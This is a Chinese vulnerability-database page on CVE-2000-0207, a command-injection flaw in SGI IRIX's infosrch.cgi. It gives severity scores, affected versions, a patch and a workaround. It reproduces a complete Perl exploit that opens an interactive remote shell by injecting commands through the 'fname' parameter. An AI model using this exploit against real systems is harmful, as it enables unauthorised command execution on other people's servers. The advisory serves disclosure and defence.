CVE-2000-0207
CVSS7.5
发布时间 :2000-03-01 00:00:00
修订时间 :2008-09-10 15:03:18
NMCOE    

[原文]SGI InfoSearch CGI program infosrch.cgi allows remote attackers to execute commands via shell metacharacters.


[CNNVD]SGI IRIX InfoSearch CGI远程执行任意命令漏洞(CNNVD-200003-001)

        
        InfoSearch是SGI IRIX操作系统所带的CGI程序,用来查看在线图书,man页和发布消息。
        软件包中的infosrch.cgi脚本实现上存在输入验证漏洞,远程攻击者可能利用此漏洞对在Web进程的权限在主机上执行任意命令。
        infosrch.cgi脚本在将'fname'变量的传送给man2html程序前,它没有正确检查参数内容,远程攻击者可以在输入中混入SHELL转义字符比如";"从而在主机上执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.5.4SGI IRIX 6.5.4
cpe:/a:sgi:infosearch:1.0SGI InfoSearch 1.0
cpe:/o:sgi:irix:6.5.3fSGI IRIX 6.5.3f
cpe:/o:sgi:irix:6.5.3mSGI IRIX 6.5.3m
cpe:/o:sgi:irix:6.5.6SGI IRIX 6.5.6
cpe:/o:sgi:irix:6.5.3SGI IRIX 6.5.3
cpe:/o:sgi:irix:6.5.2mSGI IRIX 6.5.2m
cpe:/o:sgi:irix:6.5.1SGI IRIX 6.5.1
cpe:/o:sgi:irix:6.5SGI IRIX 6.5
cpe:/o:sgi:irix:6.5.7SGI IRIX 6.5.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0207
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0207
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-001
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1031
(UNKNOWN)  BID  1031
ftp://patches.sgi.com/support/free/security/advisories/20000501-01-P
(UNKNOWN)  SGI  20000501-01-P

- 漏洞信息

SGI IRIX InfoSearch CGI远程执行任意命令漏洞
高危 输入验证
2000-03-01 00:00:00 2005-07-27 00:00:00
远程※本地  
        
        InfoSearch是SGI IRIX操作系统所带的CGI程序,用来查看在线图书,man页和发布消息。
        软件包中的infosrch.cgi脚本实现上存在输入验证漏洞,远程攻击者可能利用此漏洞对在Web进程的权限在主机上执行任意命令。
        infosrch.cgi脚本在将'fname'变量的传送给man2html程序前,它没有正确检查参数内容,远程攻击者可以在输入中混入SHELL转义字符比如";"从而在主机上执行任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时去掉infosrch.cgi脚本的执行权限:
        # /bin/chmod 500 /usr/lib/infosearch/bin/infosrch.cgi
        厂商补丁:
        SGI
        ---
        SGI已经为此发布了一个安全公告(20000501-01-P)以及相应补丁:
        20000501-01-P:Vulnerability in infosrch.cgi
        链接:ftp://patches.sgi.com/support/free/security/advisories/20000501-01-P
        补丁下载:
        
        http://support.sgi.com/colls/patches/tools/relstream/index.html

- 漏洞信息 (19788)

SGI InfoSearch 1.0,SGI IRIX 6.5.x fname Vulnerability (EDBID:19788)
irix remote
2000-03-05 Verified
0 rpc
N/A [点击下载]
source: http://www.securityfocus.com/bid/1031/info

The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users.


#!/usr/bin/perl -w
# infosearch.cgi interactive shell. 
# usage: ./infosh.pl hostname
# 3/4/00
# --rpc <h@ckz.org>

use IO::Socket;
use CGI ":escape";
$|++;

die "usage: $0 host\n" unless(@ARGV == 1);
($host) = shift @ARGV;

$cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";

# url encode and send a command.
sub send_cmd
{
	my($url_command) = $cgi . CGI::escape(shift);
	$s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
	if(!$s) { die "denied.\n"; }	
	print $s "GET $url_command HTTP/1.0\r\n";
	print $s "User-Agent: \r\n\r\n";
	@result = <$s>;
	shift @result until $result[0] =~ /^\r\n/; # uninteresting data. 
	shift @result; $#result--;		
return @result;
}

# draw a pseudo prompt. i like "\h:\w \$ ".
sub prompt
{
	@res = send_cmd("/sbin/pwd");	
	chomp($pwd = $res[0]);
	print "$host:", $pwd, "\$ ";
}

prompt;
while(!eof(STDIN)) {
	chomp($cmd = <STDIN>);
	print send_cmd($cmd);
	prompt;
}	 
		

- 漏洞信息

102
SGI InfoSearch infosrch.cgi fname Parameter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Patch / RCS
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

The SGI InfoSearch subsystem contains a flaw related to the infosrch.cgi script. The issue is triggered when a remote attacker supplies custom input to the 'fname' parameter, allowing for arbitrary command execution.

- 时间线

2000-03-03 Unknow
2000-03-02 Unknow

- 解决方案

SGI has released a patch to address this vulnerability for some versions of IRIX. Additionally, it is possible to temporarily work around the flaw by implementing the following workaround: # /bin/chmod 500 /usr/lib/infosearch/bin/infosrch.cgi

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站